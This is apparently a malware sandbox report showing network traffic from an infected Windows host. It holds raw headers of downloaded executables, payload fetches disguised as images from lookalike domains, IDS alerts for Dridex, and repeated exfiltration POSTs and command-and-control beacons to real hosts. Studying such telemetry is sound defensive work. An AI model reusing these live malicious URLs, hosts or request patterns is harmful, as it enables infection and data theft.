                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 08:48:14 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="UNIQTWO.file";Content-Length: 3795764Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 08:48:19 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="UNIQ.file";Content-Length: 163328Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 44 d8 fe 65 00 b9 90 36 00 b9 90 36 00 b9 90 36 14 d2 95 37 01 b9 90 36 14 d2 93 37 02 b9 90 36 14 d2 94 37 12 b9 90 36 14 d2 91 37 11 b9 90 36 00 b9 91 36 a0 b9 90 36 14 d2 98 37 0a b9 90 36 14 d2 6f 36 01 b9 90 36 14 d2 92 37 01 b9 90 36 52 69 63 68 00 b9 90 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f8 c4 1b ae 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 14 00 7c 00 00 00 fe 01 00 00 00 00 00 00 82 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 35 6c 03 00 02 00 60 c1 00 00 08 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c a2 00 00 b4 00 00 00 00 f0 00 00 b0 cc 01 00 00 e0 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 c0 02 00 20 00 00 00 10 9a 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 90 00 00 18 01 00 00 00 00 00 00 00 00 00 00 28 91 00 00 20 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 7b 00 00 00 10 00 00 00 7c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 22 00 00 00 90 00 00 00 24 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 1f 00 00 00 c0 00 00 00 04 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 04 00 00 00 e0 00 00 00 06 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 d0 01 00 00 f0 00 00 00 ce 01 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 00 00 00 00 c0 02 00 00 02 00 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /public_files/hkkcrng.txt HTTP/1.1Host: 62.60.226.112Connection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 185.156.73.73 185.156.73.73
                            Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                            Source: Joe Sandbox ViewASN Name: RELDAS-NETRU RELDAS-NETRU
                            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                            Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49977 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49978 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49976 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49979 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49981 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49982 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49984 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49986 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49987 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49983 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49990 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49989 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49995 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49991 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49992 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49993 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49994 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49980 -> 104.21.64.1:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49991 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49984 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49986 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49993 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49994 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49995 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49989 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49992 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49990 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49987 -> 176.113.115.96:443
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hardswarehub.today
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 43Host: hardswarehub.today
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FVS0H4HZWOR6Cookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12805Host: hardswarehub.today
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X4AXIVUV1PNMN5OUCookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15061Host: hardswarehub.today
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JNRWG4N5YCCookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20350Host: hardswarehub.today
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O1662KFEROPMNA5RZZCookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2340Host: hardswarehub.today
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GG9YAYDD7U3GTV9GCookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 582153Host: hardswarehub.today
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=7qzdIc0C79pXh_MLDe9UfURTKNBspcueSuOUtyhuXXU-1740818918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: hardswarehub.today
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81229326be8ea43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d4348cdcd091554dca HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38c926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38d926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38a926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38b926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb388926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb389926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb386926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb387926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38f842a1cec7a86d87bdb6546ad12dac0290eea11dd1729366be8ea43a8ec4cde8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935948c17231f1d805 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.73
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02B92B95 WSASetLastError,WSARecv,WSASetLastError,select,13_2_02B92B95
                            Source: global trafficHTTP traffic detected: GET /dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81229326be8ea43a8f51f8a95b5c0212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d4348cdcd091554dca HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38c926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38d926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38a926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38b926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb388926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb389926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb386926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb387926d19fe6595cd66946951e91fcd85260ce310d105672e26e4fd09b4a140c9c4e9976278d7fd449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905d40cb753cfcde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
